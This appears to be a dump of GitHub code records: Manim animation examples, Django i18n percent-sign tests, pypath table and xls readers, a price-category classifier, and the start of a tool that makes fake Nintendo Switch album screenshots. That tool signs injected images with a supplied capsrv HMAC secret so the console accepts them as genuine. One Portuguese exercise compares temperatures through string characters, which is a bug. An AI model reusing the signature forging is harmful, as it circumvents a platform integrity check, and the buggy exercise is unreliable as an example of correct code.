example_tex)\n group.arrange(DOWN)\n group.set_width(FRAME_WIDTH - 2 * LARGE_BUFF)\n\n self.play(Write(example_text))\n self.play(Write(example_tex))\n self.wait()\n\n\nclass UpdatersExample(Scene):\n def construct(self):\n decimal = DecimalNumber(\n 0,\n show_ellipsis=True,\n num_decimal_places=3,\n include_sign=True,\n )\n square = Square().to_edge(UP)\n\n decimal.add_updater(lambda d: d.next_to(square, RIGHT))\n decimal.add_updater(lambda d: d.set_value(square.get_center()[1]))\n self.add(square, decimal)\n self.play(\n square.to_edge, DOWN,\n rate_func=there_and_back,\n run_time=5,\n )\n self.wait()\n\n# See old_projects folder for many, many more\nclass 
AudioTest(Scene):\n def construct(self):\n group_dots = VGroup(*[Dot()for i in range(3)])\n group_dots.arrange_submobjects(RIGHT)\n \n for dot in group_dots:\n self.add_sound(\"/home/codexreckoner/manim/media/designs/sounds/click.wav\")\n self.play(FadeIn(dot))\n self.wait(3)\n\nclass SVGTest(Scene):\n def construct(self):\n svg = SVGMobject(\"/home/codexreckoner/manim/media/designs/svg_images/finger.svg\")\n self.play(Write(svg))\n self.wait()\nclass ImageTest(Scene):\n def construct(self):\n image = ImageMobject(\"/home/codexreckoner/manim/media/designs/raster_images/space.jpg\")\n image.scale(7)\n self.play(FadeIn(image))\n self.wait(3)\n \n Text = TextMobject(\"Prueba para fondos de animacion\")\n self.play(Write(Text))\n self.wait(3)\n \nclass TikzMobject(TextMobject):\n CONFIG = {\n \"stroke_width\": 3,\n \"fill_opacity\": 0,\n \"stroke_opacity\": 1,\n }\n\nclass ExampleTikz(Scene):\n def construct(self):\n circuit = TikzMobject(r\"\"\"\n \\begin{circuitikz}[american voltages]\n \\draw\n (0,0) to [short, *-] (6,0)\n to [V, l_=$\\mathrm{j}{\\omega}_m \\underline{\\psi}^s_R$] (6,2) \n to [R, l_=$R_R$] (6,4) \n to [short, i_=$\\underline{i}^s_R$] (5,4) \n (0,0) to [open,v^>=$\\underline{u}^s_s$] (0,4) \n to [short, *- ,i=$\\underline{i}^s_s$] (1,4) \n to [R, l=$R_s$] (3,4)\n to [L, l=$L_{\\sigma}$] (5,4) \n to [short, i_=$\\underline{i}^s_M$] (5,3) \n to [L, l_=$L_M$] (5,0); \n \\end{circuitikz}\n \"\"\"\n )\n self.play(Write(circuit))\n self.wait()\n\n","repo_name":"JazzzFM/ManimAct","sub_path":"MyAnimations/example_scenes.py","file_name":"example_scenes.py","file_ext":"py","file_size_in_byte":5661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6305829035","text":"import os\n\nfrom django.template import Context, Template\nfrom django.test import SimpleTestCase, override_settings\nfrom django.utils.translation import activate, get_language, trans_real\n\nfrom .utils import POFileAssertionMixin\n\nSAMPLEPROJECT_DIR = os.path.join(\n os.path.dirname(os.path.abspath(__file__)), \"sampleproject\"\n)\nSAMPLEPROJECT_LOCALE = os.path.join(SAMPLEPROJECT_DIR, \"locale\")\n\n\n@override_settings(LOCALE_PATHS=[SAMPLEPROJECT_LOCALE])\nclass FrenchTestCase(SimpleTestCase):\n \"\"\"Tests using the French translations of the sampleproject.\"\"\"\n\n PO_FILE = os.path.join(SAMPLEPROJECT_LOCALE, \"fr\", \"LC_MESSAGES\", \"django.po\")\n\n def setUp(self):\n self._language = get_language()\n self._translations = trans_real._translations\n activate(\"fr\")\n\n def tearDown(self):\n trans_real._translations = self._translations\n activate(self._language)\n\n\nclass ExtractingStringsWithPercentSigns(POFileAssertionMixin, FrenchTestCase):\n \"\"\"\n Tests the extracted string found in the gettext catalog.\n\n Percent signs are python formatted.\n\n These tests should all have an analogous translation tests below, ensuring\n the Python formatting does not persist through to a rendered template.\n \"\"\"\n\n def setUp(self):\n super().setUp()\n with open(self.PO_FILE) as fp:\n self.po_contents = fp.read()\n\n def test_trans_tag_with_percent_symbol_at_the_end(self):\n self.assertMsgId(\n \"Literal with a percent symbol at the end %%\", self.po_contents\n )\n\n def test_trans_tag_with_percent_symbol_in_the_middle(self):\n self.assertMsgId(\n \"Literal with a percent %% symbol in the middle\", self.po_contents\n )\n self.assertMsgId(\"It is 100%%\", self.po_contents)\n\n def test_trans_tag_with_string_that_look_like_fmt_spec(self):\n 
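# In the extracted catalog each literal % is doubled to %% (python-format escaping), so strings that merely resemble format specifiers stay escaped too.\n        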
self.assertMsgId(\n \"Looks like a str fmt spec %%s but should not be interpreted as such\",\n self.po_contents,\n )\n self.assertMsgId(\n \"Looks like a str fmt spec %% o but should not be interpreted as such\",\n self.po_contents,\n )\n\n def test_adds_python_format_to_all_percent_signs(self):\n self.assertMsgId(\n \"1 percent sign %%, 2 percent signs %%%%, 3 percent signs %%%%%%\",\n self.po_contents,\n )\n self.assertMsgId(\n \"%(name)s says: 1 percent sign %%, 2 percent signs %%%%\", self.po_contents\n )\n\n\nclass RenderingTemplatesWithPercentSigns(FrenchTestCase):\n \"\"\"\n Test rendering of templates that use percent signs.\n\n Ensures both translate and blocktranslate tags behave consistently.\n\n Refs #11240, #11966, #24257\n \"\"\"\n\n def test_translates_with_a_percent_symbol_at_the_end(self):\n expected = \"Littérale avec un symbole de pour cent à la fin %\"\n\n trans_tpl = Template(\n \"{% load i18n %}\"\n '{% translate \"Literal with a percent symbol at the end %\" %}'\n )\n self.assertEqual(trans_tpl.render(Context({})), expected)\n\n block_tpl = Template(\n \"{% load i18n %}{% blocktranslate %}Literal with a percent symbol at \"\n \"the end %{% endblocktranslate %}\"\n )\n self.assertEqual(block_tpl.render(Context({})), expected)\n\n def test_translates_with_percent_symbol_in_the_middle(self):\n expected = \"Pour cent littérale % avec un symbole au milieu\"\n\n trans_tpl = Template(\n \"{% load i18n %}\"\n '{% translate \"Literal with a percent % symbol in the middle\" %}'\n )\n self.assertEqual(trans_tpl.render(Context({})), expected)\n\n block_tpl = Template(\n \"{% load i18n %}{% blocktranslate %}Literal with a percent % symbol \"\n \"in the middle{% endblocktranslate %}\"\n )\n self.assertEqual(block_tpl.render(Context({})), expected)\n\n def test_translates_with_percent_symbol_using_context(self):\n trans_tpl = Template('{% load i18n %}{% translate \"It is 100%\" %}')\n self.assertEqual(trans_tpl.render(Context({})), \"Il est de 100%\")\n trans_tpl = Template(\n '{% load i18n %}{% translate \"It is 100%\" context \"female\" %}'\n )\n self.assertEqual(trans_tpl.render(Context({})), \"Elle est de 100%\")\n\n block_tpl = Template(\n \"{% load i18n %}{% blocktranslate %}It is 100%{% endblocktranslate %}\"\n )\n self.assertEqual(block_tpl.render(Context({})), \"Il est de 100%\")\n block_tpl = Template(\n \"{% load i18n %}\"\n '{% blocktranslate context \"female\" %}It is 100%{% endblocktranslate %}'\n )\n self.assertEqual(block_tpl.render(Context({})), \"Elle est de 100%\")\n\n def test_translates_with_string_that_look_like_fmt_spec_with_trans(self):\n # tests \"%s\"\n expected = (\n \"On dirait un spec str fmt %s mais ne devrait pas être interprété comme \"\n \"plus disponible\"\n )\n trans_tpl = Template(\n '{% load i18n %}{% translate \"Looks like a str fmt spec %s but '\n 'should not be interpreted as such\" %}'\n )\n self.assertEqual(trans_tpl.render(Context({})), expected)\n block_tpl = Template(\n \"{% load i18n %}{% blocktranslate %}Looks like a str fmt spec %s but \"\n \"should not be interpreted as such{% endblocktranslate %}\"\n )\n self.assertEqual(block_tpl.render(Context({})), expected)\n\n # tests \"% o\"\n expected = (\n \"On dirait un spec str fmt % o mais ne devrait pas être interprété comme \"\n \"plus disponible\"\n )\n trans_tpl = Template(\n \"{% load i18n %}\"\n '{% translate \"Looks like a str fmt spec % o but should not be '\n 'interpreted as such\" %}'\n )\n self.assertEqual(trans_tpl.render(Context({})), expected)\n block_tpl = Template(\n \"{% 
load i18n %}\"\n \"{% blocktranslate %}Looks like a str fmt spec % o but should not be \"\n \"interpreted as such{% endblocktranslate %}\"\n )\n self.assertEqual(block_tpl.render(Context({})), expected)\n\n def test_translates_multiple_percent_signs(self):\n expected = (\n \"1 % signe pour cent, signes %% 2 pour cent, trois signes de pourcentage \"\n \"%%%\"\n )\n trans_tpl = Template(\n '{% load i18n %}{% translate \"1 percent sign %, 2 percent signs %%, '\n '3 percent signs %%%\" %}'\n )\n self.assertEqual(trans_tpl.render(Context({})), expected)\n block_tpl = Template(\n \"{% load i18n %}{% blocktranslate %}1 percent sign %, 2 percent signs \"\n \"%%, 3 percent signs %%%{% endblocktranslate %}\"\n )\n self.assertEqual(block_tpl.render(Context({})), expected)\n\n block_tpl = Template(\n \"{% load i18n %}{% blocktranslate %}{{name}} says: 1 percent sign %, \"\n \"2 percent signs %%{% endblocktranslate %}\"\n )\n self.assertEqual(\n block_tpl.render(Context({\"name\": \"Django\"})),\n \"Django dit: 1 pour cent signe %, deux signes de pourcentage %%\",\n )\n","repo_name":"django/django","sub_path":"tests/i18n/test_percents.py","file_name":"test_percents.py","file_ext":"py","file_size_in_byte":7199,"program_lang":"python","lang":"en","doc_type":"code","stars":74132,"dataset":"github-code","pt":"37"} +{"seq_id":"22424026429","text":"#Faça um programa que receba a temperatura média de cada mês do ano e armazene-as em uma lista. Após isto, calcule a média anual das temperaturas e mostre todas as temperaturas acima da média anual, e em que mês elas ocorreram (mostrar o mês por extenso: 1 – Janeiro, 2 – Fevereiro, . . . ).\n\nfrom random import uniform\nfrom time import sleep\n\nmeses_ano = [\"Janeiro\", \"Fevereiro\", \"Março\", \"Abril\", \"Maio\", \"Junho\", \"Julho\", \"Agosto\", \"Setembro\", \"Outubro\", \"Novembro\", \"Dezembro\"]\ntemperaturas = []\ntemperaturas_elevadas =[]\nsoma, media = 0, 0\nfor c in range(0, 12):\n temperatura_mensal = uniform(20.0, 40.0)\n temperaturas.append(temperatura_mensal)\n soma+= temperatura_mensal\nmedia = soma / len(temperaturas)\nfor c in range(0,12):\n if str(temperatura_mensal)[c] > str(media):\n temperaturas_elevadas.append(meses_ano[c])\n\nprint(f\"Os meses do ano com temperaturas mais elevadas foram {temperaturas_elevadas}\")\n\n\n","repo_name":"Fillypper/Curso_Python","sub_path":"Exercicios_Listas/exercicio_13.py","file_name":"exercicio_13.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20266632980","text":"import coverage\r\nimport unittest\r\n\r\nif __name__ == \"__main__\":\r\n cov = coverage.Coverage()\r\n\r\n cov.start()\r\n suite = unittest.TestLoader().discover(\"streamanalyser/tests\", pattern=\"*\")\r\n unittest.TextTestRunner().run(suite)\r\n cov.stop()\r\n\r\n cov.save()\r\n\r\n cov.report()\r\n\r\n cov.html_report()\r\n","repo_name":"emso-c/stream-analyser","sub_path":"test_coverage.py","file_name":"test_coverage.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"70278551789","text":"from future.utils import iteritems\nfrom past.builtins import xrange, range\n\nimport os\nimport sys\nimport warnings\nimport json\n\nfrom typing import Any, Callable, Dict, IO, List, Optional, Union\n\nimport xlrd\nimport openpyxl\nimport glom\n\nimport pypath.share.session as session_mod\nimport pypath.share.common as common\nimport 
pypath.share.constants as constants\n\n_logger = session_mod.Logger(name = 'inputs_common')\n_log = _logger._log\n_console = _logger._console\n\nif 'unicode' not in __builtins__: unicode = str\n\n\ndef read_xls(\n xls_file,\n sheet = 0,\n use_openpyxl = False,\n cell_range = None,\n ):\n \"\"\"\n Generic function to read MS Excel XLS file, and convert one sheet\n to CSV, or return as a list of lists\n \"\"\"\n\n table = []\n opened_here = False\n\n if isinstance(xls_file, common.basestring):\n\n if os.path.exists(xls_file):\n\n xls_file = open(xls_file, 'rb')\n opened_here = True\n\n else:\n\n raise FileNotFoundError(xls_file)\n\n if not use_openpyxl:\n\n try:\n\n _log('Reading XLS(X) by xlrd.')\n\n if hasattr(xls_file, 'read'):\n\n book = xlrd.open_workbook(\n file_contents = xls_file.read(),\n on_demand = True,\n )\n\n try:\n if isinstance(sheet, int):\n sheet = book.sheet_by_index(sheet)\n else:\n sheet = book.sheet_by_name(sheet)\n except xlrd.biffh.XLRDError:\n sheet = book.sheet_by_index(0)\n\n table = [\n [common.basestring(c.value) for c in sheet.row(i)]\n for i in xrange(sheet.nrows)\n ]\n\n use_openpyxl = False\n\n except IOError:\n\n raise FileNotFoundError(xls_file)\n\n except Exception as e:\n\n _log('Failed to read by xlrd, falling back to openpyxl.')\n _logger._log_traceback()\n use_openpyxl = True\n\n if use_openpyxl:\n\n try:\n\n _log('Reading XLS(X) by openpyxl.')\n\n book = openpyxl.load_workbook(\n filename = xls_file,\n read_only = True,\n data_only = True,\n )\n\n except Exception as e:\n\n _log(f'Failed to read `{xls_file}` by openpyxl.')\n _logger._log_traceback()\n raise ValueError('Could not open xls: %s' % xls_file)\n\n try:\n\n if type(sheet) is int:\n sheet = book.worksheets[sheet]\n else:\n sheet = book[sheet]\n\n except:\n\n sheet = book.worksheets[0]\n\n # this is to suppress the openpyxl unknown extension warnings\n # which we can not avoid as the xlsx files were produced not by us\n with warnings.catch_warnings():\n\n warnings.simplefilter('ignore')\n\n table = [\n [\n (\n cell\n if isinstance(cell, str) else\n cell.value\n if cell is not None else\n ''\n )\n for cell in row\n ]\n for row in (sheet[cell_range] if cell_range else sheet.values)\n ]\n\n if 'book' in locals() and hasattr(book, 'release_resources'):\n\n book.release_resources()\n\n if opened_here:\n\n xls_file.close()\n\n return table\n\n\ndef csv_sep_change(csv, old, new):\n\n clean_csv = []\n bw_quotes = False\n\n for char in csv:\n if char == '\\r':\n continue\n elif char == '\"':\n bw_quotes = not bw_quotes\n elif char == '\\n':\n if not bw_quotes:\n clean_csv.append(char)\n else:\n clean_csv.append(' ')\n elif char == old:\n if bw_quotes:\n clean_csv.append(char)\n else:\n clean_csv.append(new)\n else:\n clean_csv.append(char)\n\n return ''.join(clean_csv)\n\n\ndef _try_isoform(name):\n\n name = name.split('-')\n\n if len(name) > 1 and name[1].isdigit():\n\n isoform = int(name[1])\n main = name[0]\n\n else:\n\n main = '-'.join(name)\n isoform = None\n\n return main, isoform\n\n\ndef read_table(\n cols,\n fileObject = None,\n data = None,\n sep = '\\t',\n sep2 = None,\n rem = None,\n hdr = None,\n encoding = 'ascii',\n ):\n \"\"\"\n Generic function to read data tables.\n\n fileObject : file-like\n Any file like object: file opened for read, or StringIO buffer\n cols : dict\n Dictionary of columns to read. Keys identifying fields are returned\n in the result. Values are column numbers.\n sep : str\n Field separator of the file.\n sep2 : dict\n Subfield separators and prefixes.\n E.g. 
{2: ',', 3: '|'}\n    hdr : int\n        Number of header lines. If None, no headers assumed.\n    rem : list\n        Strings to remove. For each line these elements will be replaced with ''.\n    \"\"\"\n\n    rem = rem or []\n\n    if data is None:\n\n        if hasattr(fileObject, 'readline'):\n\n            fileObject.seek(0)\n\n            if hdr:\n\n                for h in xrange(0, hdr):\n\n                    _ = next(fileObject)\n\n            data = fileObject\n\n        else:\n\n            data = [l.strip() for l in data.split('\\n') if len(l) > 0][hdr:]\n\n    res = []\n\n    for l in data:\n\n        if type(l) is bytes:\n\n            l = l.decode(encoding)\n\n        for r in rem:\n\n            l = l.replace(r, '')\n\n        l = [f.strip() for f in l.split(sep)]\n\n        if len(l) > max(cols.values()):\n\n            dic = {}\n\n            for name, col in iteritems(cols):\n\n                field = l[col].strip()\n\n                _sep2 = (\n                    sep2[col]\n                    if isinstance(sep2, dict) and col in sep2 else\n                    sep2\n                    if isinstance(sep2, common.basestring) else\n                    None\n                )\n\n                if _sep2:\n\n                    field = tuple(\n                        sf.strip()\n                        for sf in field.split(_sep2)\n                        if sf\n                    )\n\n                dic[name] = field\n\n            res.append(dic)\n\n    if fileObject is not None:\n\n        fileObject.close()\n\n    return res\n\n\ndef json_extract(\n        data: Union[dict, list, str, IO],\n        spec: dict,\n    ) -> List[dict]:\n    \"\"\"\n    Extracts fields of arbitrary depth from JSON data into a list of dicts.\n\n    Args\n        data: JSON as a string or a file-like object.\n        spec: Dict of glom field specifications.\n    \"\"\"\n\n    data = json_read(data)\n\n    if isinstance(data, dict):\n\n        data = [data]\n\n    if not isinstance(data, list):\n\n        msg = 'Don\\'t know how to process data of type `%s`.' % type(data)\n        raise TypeError(msg)\n\n\n    return [\n        glom.glom(rec, spec, default = constants.GLOM_ERROR)\n        for rec in data\n    ]\n\n\ndef json_read(data: Union[str, IO, Any]) -> Union[list, dict, Any]:\n    \"\"\"\n    Reads JSON from file or string, pass through for any other value.\n    \"\"\"\n\n    if isinstance(data, IO):\n\n        data = json.load(data)\n\n    elif isinstance(data, str):\n\n        data = json.loads(data)\n\n    return data\n\n\nGlomSpec = Union[str, tuple, dict, Callable]\n\nGlomFields = Union[\n    List[str],\n    Dict[str, GlomSpec]\n]\n\ndef glom_fields(fields: Optional[GlomFields] = None) -> Dict[str, GlomSpec]:\n    \"\"\"\n    Generates a glom spec dict from a list or dict, protecting each field\n    by glom.Coalesce.\n    \"\"\"\n\n    fields = fields or {}\n\n    fields = fields if isinstance(fields, dict) else dict(zip(fields, fields))\n\n    fields = dict(\n        (\n            k,\n            glom.Coalesce(v, default = None)\n        )\n        for k, v in fields.items()\n    )\n\n    return fields\n","repo_name":"saezlab/pypath","sub_path":"pypath/inputs/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":7922,"program_lang":"python","lang":"en","doc_type":"code","stars":114,"dataset":"github-code","pt":"37"} +{"seq_id":"22030535984","text":"from sklearn.naive_bayes import MultinomialNB\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.pipeline import FeatureUnion\n\n\nclass Result:\n\n    def __init__(self):\n        values = self.input_values()\n        self.name = values[0]\n        self.provider = values[1]\n        self.price = values[2]\n\n    def input_values(self):\n        name = input(\"Enter the service name: \")\n        provider = input(\"Enter the provider (aws/azure/gcp): \")\n        if provider.lower().strip() not in [\"aws\", \"azure\", \"gcp\"]:\n            return self.input_values()\n        price = input(\"Enter the price: \")\n        if not price.replace(\".\", \"\", 1).isdigit():\n            return self.input_values()\n        return [name, provider, price]\n\n    def get_result(self, df, data):\n        texts = []\n        categories = []\n        for category in data:
\n            for platform in data[category]:\n                texts.append(\" \".join(data[category][platform]))\n                categories.append(category)\n        text_clf = Pipeline([\n            ('union',\n             FeatureUnion(\n                 transformer_list=[('cv_word', CountVectorizer()),\n                                   ('cv_char', CountVectorizer(analyzer=\"char\"))],\n                 transformer_weights={\n                     'cv_word': 0.8,\n                     'cv_char': 0.2\n                 },\n             )), ('clf', MultinomialNB())\n        ])\n        text_clf.fit(texts, categories)\n        predicted_category = text_clf.predict([self.name])\n        df = df[df['category'] == predicted_category[0]]\n        y_median = ['aws_median', 'azure_median', 'gcp_median']\n        x_median = df[f'{self.provider}_median'].values[0]\n        y_median.remove(f'{self.provider}_median')\n        factor = float(self.price) / x_median\n        print(f\"Approximate category: {predicted_category[0]}\")\n        for median in y_median:\n            val = \"{:.2f}\".format(df[median].values[0] * factor)\n            print(\n                f\"Estimated price in {median.replace('_median', '').upper()}: {val}\")\n","repo_name":"Nemryk/Provider-Price-Checking","sub_path":"result.py","file_name":"result.py","file_ext":"py","file_size_in_byte":1866,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35275654827","text":"import os\nimport io\nimport hmac\nimport json\nimport piexif\nimport shutil\nimport appdirs\nimport rarfile\nimport zipfile\nimport tempfile\nfrom sys import exit\nfrom PIL import Image\nfrom AnyQt import QtCore\nfrom hashlib import sha256\nfrom datetime import datetime\nfrom pyforms.basewidget import BaseWidget\nfrom pyforms.controls import ControlText\nfrom pyforms.controls import ControlCombo\nfrom pyforms.controls import ControlLabel\nfrom pyforms.controls import ControlButton\nfrom pyforms.controls import ControlCheckBox\nfrom pyforms.controls import ControlFilesTree\nfrom pyforms.controls import ControlDockWidget\nfrom AnyQt.QtWidgets import QTreeView, QFileSystemModel\n\ngames_json = {\n\t\"Home Menu (Default)\": \"57B4628D2267231D57E0FC1078C0596D\",\n\t\"Home Menu (Controllers)\": \"1E95E5926F1CB99A87326D927F27B47E\",\n\t\"Home Menu (Profiles)\": \"CCFA659F4857F96DDA29AFEDB2E166E6\",\n\t\"1-2-Switch\": \"2B1F1288BC05B2D89D8431910DBA2878\",\n\t\"Crash Bandicoot N.sane Trilogy\": \"3D8E1DE4D671F7453AFA0C395B825E90\",\n\t\"Kirby Star Allies\": \"B20FAEC679A3A9320864DC374CFB9713\",\n\t\"Mario + Rabbids Kingdom Battle\": \"9600BAE614E6833B1A261F5FB229CDBA\",\n\t\"Mario Kart 8 Deluxe\": \"16851BE00BC6068871FE49D98876D6C5\",\n\t\"Octopath Traveler\": \"93C1C73A3BAF9123A15B9B24886B634B\",\n\t\"Puyo Puyo Tetris\": \"0585E865DFB68B5298F19360A730EDB3\",\n\t\"Snake Pass\": \"554C97481EFDFC30DCDF01FC5CC877A6\",\n\t\"Sonic Mania\": \"1628E0CE3F839127054B0EE36E28E52A\",\n\t\"Splatoon 2\": \"397A963DA4660090D65D330174AC6B04\",\n\t\"Super Mario Odyssey\": \"8AEDFF741E2D23FBED39474178692DAF\",\n\t\"The Legend of Zelda: Breath of the Wild\": \"F1C11A22FAEE3B82F21B330E1B786A39\",\n\t\"Xenoblade Chronicles 2\": \"659B13F48903294AE2B3FA4F12DA9898\",\n\t\"Xenoblade Chronicles 2: Torna - The Golden Country\": \"4CBEE39065EC88984BABA68A511DDD19\"\n}\n\nsettings_json = {\n\t\"outputfolder\": \".\",\n\t\"hmackey\": \"\",\n\t\"customgameid\": \"57B4628D2267231D57E0FC1078C0596D\",\n\t\"type\": \"image\",\n\t\"direction\": \"ltr\"\n}\n\n#From my testing, piexif's _dump._get_thumbnail() returns an invalid thumbnail for the Switch (it shows a \"?\"). 
What we can do though is replace it with this dirty fix.\n#There's probably a better way to do it, like using a different library, but eh, it works™ ¯\\_(ツ)_/¯\n#From StackOverflow (Monkey Patching): https://stackoverflow.com/questions/10429547/how-to-change-a-function-in-existing-3rd-party-library-in-python\npiexif._dump._get_thumbnail = lambda jpeg: jpeg #Return it as it is, no need to modify it.\n\ndef resizeImage(path, sizeX, sizeY, state, secondFilePath):\n\tsize = (sizeX, sizeY)\n\tresizedImage = Image.new(\"RGB\", size, (0, 0, 0))\n\timage1 = Image.open(path).convert(\"RGB\")\n\timage1.thumbnail(size)\n\twidth1, height1 = image1.size\n\tif state != 0 and secondFilePath != \"\":\n\t\timage2 = Image.open(secondFilePath).convert(\"RGB\")\n\t\timage2.thumbnail(size)\n\t\twidth2, height2 = image2.size\n\t\tif state == 1:\n\t\t\tresizedImage.paste(image1, (int(sizeX/2-width1), int((sizeY-height1)/2)))\n\t\t\tresizedImage.paste(image2, (int(sizeX/2), int((sizeY-height2)/2)))\n\t\telse:\n\t\t\tresizedImage.paste(image2, (int(sizeX/2-width2), int((sizeY-height2)/2)))\n\t\t\tresizedImage.paste(image1, (int(sizeX/2), int((sizeY-height1)/2)))\n\telse:\n\t\tresizedImage.paste(image1, (int((sizeX - width1) / 2), int((sizeY - height1) / 2)))\n\treturn resizedImage\n\ndef createJPEGExif(exifDict, makerNote, timestamp, thumbnail):\n\tnewExifDict = exifDict.copy()\n\tnewExifDict.update({\n\t\t\"Exif\": {36864: b\"0230\", 37121: b\"\\x01\\x02\\x03\\x00\", 40962: 1280, 40963: 720, 40960: b\"0100\", 40961: 1, 37500: makerNote},\n\t\t\"0th\": {274: 1, 531: 1, 296: 2, 34665: 164, 282: (72, 1), 283: (72, 1), 306: timestamp, 271: \"Nintendo co., ltd\"},\n\t\t\"1st\": {513: 1524, 514: 32253, 259: 6, 296: 2, 282: (72, 1), 283: (72, 1)},\n\t\t\"thumbnail\": thumbnail\n\t\t})\n\treturn newExifDict\n\ndef getImageHmac(key, input):\n\treturn hmac.new(key, input, sha256).digest()\n\ndef processFile(fileName, key, titleID, baseOutputFolder, state = 0, secondFilePath = None):\n\tdate = datetime.now()\n\toutputFolder = baseOutputFolder + date.strftime(\"/Nintendo/Album/%Y/%m/%d/\")\n\tind = 0\n\twhile os.path.isfile(outputFolder + date.strftime(\"%Y%m%d%H%M%S\") + \"{:02d}\".format(ind) + \"-\" + titleID + \".jpg\"):\n\t\tind += 1\n\t\tif ind > 99:\n\t\t\tdate = datetime.now()\n\t\t\toutputFolder = date.strftime(\"SD/Nintendo/Album/%Y/%m/%d/\")\n\t\t\tind = 0\n\toutputPath = outputFolder + date.strftime(\"%Y%m%d%H%M%S\") + \"{:02d}\".format(ind) + \"-\" + titleID + \".jpg\"\n\tos.makedirs(outputFolder, exist_ok=True)\n\tinputImage = io.BytesIO()\n\toutputImage = io.BytesIO()\n\tthumbnail = io.BytesIO()\n\tresizeImage(fileName, 1280, 720, state, secondFilePath).save(inputImage, \"JPEG\", quality = 80) #The screenshots must have a size of 1280x720\n\tresizeImage(fileName, 320, 180, state, secondFilePath).save(thumbnail, \"JPEG\", quality = 40) #The thumbnails (at least on my screenshots) have a size of 320x180\n\tmakerNoteZero = b\"\\x00\\x00\\x00\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x10\\x00\" + bytes.fromhex(titleID)\n\ttimestamp = date.strftime(\"%Y:%m:%d %H:%M:%S\")\n\texifData = piexif.dump(createJPEGExif(piexif.load(inputImage.getvalue()), makerNoteZero, timestamp, thumbnail.getvalue()))\n\tpiexif.insert(exifData, inputImage.getvalue(), outputImage)\n\tmakerNote = b\"\\x00\\x00\\x00\\x00\\x00\\x00\\x10\\x00\" + getImageHmac(key, outputImage.getvalue())[:16] + b\"\\x01\\x00\\x10\\x00\" + bytes.fromhex(titleID)\n\toutputBytes = 
outputImage.getvalue().replace(makerNoteZero, makerNote)\n\twith open(outputPath, \"wb\") as file:\n\t\tfile.write(outputBytes)\n\nclass SettingsWindow(BaseWidget):\n\tdef __init__(self, *args, **kwargs):\n\t\tglobal settings_json\n\t\tBaseWidget.__init__(self, \"Settings\")\n\t\tself._settingslabel = ControlLabel(\"Settings\")\n\t\tself._outputfolder = ControlText(\"SD Card Path\")\n\t\tself._outputfolder.value = settings_json[\"outputfolder\"]\n\t\tself._hmackey = ControlText(\"Capsrv HMAC Secret\")\n\t\tself._hmackey.value = settings_json[\"hmackey\"]\n\t\tself._customgameid = ControlText(\"Custom Game ID\")\n\t\tself._customgameid.value = settings_json[\"customgameid\"]\n\t\tself._typelabel = ControlLabel(\"Type\")\n\t\tself._imagecheckbox = ControlCheckBox(\"Image\")\n\t\tself._imagecheckbox.value = (settings_json[\"type\"] == \"image\")\n\t\tself._imagecheckbox.changed_event = self.imageCheckbox\n\t\tself._mangacheckbox = ControlCheckBox(\"Manga\")\n\t\tself._mangacheckbox.value = (settings_json[\"type\"] == \"manga\")\n\t\tself._mangacheckbox.changed_event = self.mangaCheckbox\n\t\tself._comiccheckbox = ControlCheckBox(\"Comics\")\n\t\tself._comiccheckbox.value = (settings_json[\"type\"] == \"comics\")\n\t\tself._comiccheckbox.changed_event = self.comicCheckbox\n\t\tself._directionlabel = ControlLabel(\"Direction\")\n\t\tself._directionlabel.hide()\n\t\tself._lefttoright = ControlCheckBox(\"From left to right\")\n\t\tself._lefttoright.hide()\n\t\tself._lefttoright.value = (settings_json[\"direction\"] == \"ltr\")\n\t\tself._lefttoright.changed_event = self.fromLeftToRight\n\t\tself._righttoleft = ControlCheckBox(\"From right to left\")\n\t\tself._righttoleft.hide()\n\t\tself._righttoleft.value = (settings_json[\"direction\"] == \"rtl\")\n\t\tself._righttoleft.changed_event = self.fromRightToLeft\n\t\tself._savebutton = ControlButton(\"Save\")\n\t\tself._savebutton.value = self.saveButton\n\t\tself.formset = [(\"_settingslabel\"), (\"_outputfolder\"), (\"_hmackey\"), (\"_customgameid\"), (\"_typelabel\"), (\"_imagecheckbox\", \"_mangacheckbox\", \"_comiccheckbox\"), (\"_directionlabel\"), (\"_lefttoright\", \"_righttoleft\"), (\" \"), (\" \", \" \", \"_savebutton\")]\n\t\tself._typerequested = False\n\t\tself._directionrequested = False\n\n\t#Reimplementing radio buttons sure is fun\n\tdef imageCheckbox(self):\n\t\tif self._typerequested:\n\t\t\treturn\n\t\tself._typerequested = True\n\t\tself._mangacheckbox.value = False\n\t\tself._comiccheckbox.value = False\n\t\tself._imagecheckbox.value = True\n\t\tself._directionlabel.hide()\n\t\tself._lefttoright.hide()\n\t\tself._righttoleft.hide()\n\t\tself._typerequested = False\n\n\tdef comicCheckbox(self):\n\t\tif self._typerequested:\n\t\t\treturn\n\t\tself._typerequested = True\n\t\tself._mangacheckbox.value = False\n\t\tself._comiccheckbox.value = True\n\t\tself._imagecheckbox.value = False\n\t\tself._directionlabel.show()\n\t\tself._lefttoright.show()\n\t\tself._righttoleft.show()\n\t\tself._typerequested = False\n\n\tdef mangaCheckbox(self):\n\t\tif self._typerequested:\n\t\t\treturn\n\t\tself._typerequested = True\n\t\tself._mangacheckbox.value = True\n\t\tself._comiccheckbox.value = False\n\t\tself._imagecheckbox.value = False\n\t\tself._directionlabel.show()\n\t\tself._lefttoright.show()\n\t\tself._righttoleft.show()\n\t\tself._typerequested = False\n\n\tdef fromLeftToRight(self):\n\t\tif self._directionrequested:\n\t\t\treturn\n\t\tself._directionrequested = True\n\t\tself._lefttoright.value = True\n\t\tself._righttoleft.value = 
